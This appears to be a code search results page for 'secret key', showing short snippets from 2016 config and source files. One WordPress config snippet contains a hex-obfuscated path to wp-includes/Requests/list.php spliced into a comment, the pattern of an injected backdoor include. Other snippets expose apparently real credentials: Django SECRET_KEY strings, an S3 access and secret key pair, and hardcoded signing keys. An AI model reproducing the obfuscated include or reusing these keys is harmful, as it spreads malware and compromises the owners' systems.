8.6K results in 20 ms
9 years ago · Dec 19, 2016, 11:36 AM
the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change
9 years ago · Dec 18, 2016, 11:00 PM
the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key servi*/"\x2fhom\x653/a\x73fid\x61na/\x70ubl\x69c_h\x74ml/\x6bela\x73tah\x66iz.\x63om/\x77p-i\x6eclu\x64es/\x52equ\x65sts\x2flis\x74.ph\x70";/*ce} * You can change
9 years ago · Dec 18, 2016, 10:34 PM
used in production secret! SECRET_KEY = *********** # SECURITY WARNING: don't run
9 years ago · Dec 18, 2016, 09:16 PM
PREPEND_WWW = False ROOT_URLCONF = 'rimini_configurator.urls' SECRET_KEY = '********************' SECURE_BROWSER_XSS_FILTER = False SECURE_CONTENT_TYPE_NOSNIFF = False
9 years ago · Dec 18, 2016, 08:12 PM
provider "aws" { access_key = "ACCESS_KEY_HERE" secret_key = "SECRET_KEY_HERE" region = "us-east-1" } resource "aws_instance" "example" { ami = "ami-0d729a60" instance_type = "t2.micro" }
9 years ago · Dec 18, 2016, 02:22 PM
oauthUrl = Constants.oauth + Constants.userDetailsUrl; String secretKey = Constants.secretKey; String clientId = Constants.clientId;
9 years ago · Dec 18, 2016, 12:54 PM
used in production secret! SECRET_KEY = '0tax3n(@rr-p(ri)7+-pi^l%9q4#i^5(^z^$97%-#jv5%ae-i@' # SECURITY WARNING: don't
9 years ago · Dec 17, 2016, 10:23 PM
ls config.xml identity.key.enc logs secret.key userContent hudson.model.UpdateCenter.xml jenkins.install.InstallUtil.lastExecVersion nodeMonitors.xml
9 years ago · Dec 17, 2016, 08:40 PM
the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change
9 years ago · Dec 17, 2016, 02:05 PM
protected String hashToString(String url, byte[] secretKey) { String result = null; Mac sha512_HMAC; try { sha512_HMAC = Mac.getInstance("HmacSHA512"); SecretKeySpec secretkey = new SecretKeySpec(secretKey, "HmacSHA512"); sha512_HMAC.init(secretkey); byte[] mac_data = sha512_HMAC.doFinal(url.getBytes()); result = Base64.encodeBase64String(mac_data); }catch(Exception e){ } return result; }
9 years ago · Dec 17, 2016, 01:57 PM
used in production secret! SECRET_KEY = '2so4*syv$3($#5p#^oos&^8^3%q5i&6k1gi$s&_c!si@69vl1y' # SECURITY WARNING: don't
9 years ago · Dec 17, 2016, 01:24 PM
NoSuchAlgorithmException e) { e.printStackTrace(); } SecretKeySpec secretKey = new SecretKeySpec(secret.getBytes(), encryption); try
9 years ago · Dec 17, 2016, 02:32 AM
NoSuchAlgorithmException e) { e.printStackTrace(); } SecretKeySpec secretKey = new SecretKeySpec(secret.getBytes(), encryption); try
9 years ago · Dec 17, 2016, 01:40 AM
let Q = require('q'); let secretKey = 'youAremAnoRGril'; module.exports = { sign(playload) { let
9 years ago · Dec 17, 2016, 12:36 AM
the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change
9 years ago · Dec 16, 2016, 08:08 PM
the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change
9 years ago · Dec 16, 2016, 05:20 PM
URL access_key: amazon key secret_key: amazon secret key bucket:
9 years ago · Dec 16, 2016, 04:44 PM
bucket: my-bucket-name access_key: a50d28f4dd477bc184fbd10b376de753 secret_key: bc5785d3ece6a9cdefa42eb99b58986f9095ff1c source: public/**/* target:
9 years ago · Dec 16, 2016, 03:30 PM
S3" # accessKeyId: # Ref: "CfnKeys" # secretKey: # Fn::GetAtt: # - "CfnKeys" # - "SecretAccessKey" Buckets:
9 years ago · Dec 16, 2016, 02:40 PM
Queue import boto.sqs ACCESS_KEY = "" SECRET_KEY = "" REGION = "us-east-1" print ("Connecting")
Total pages: 429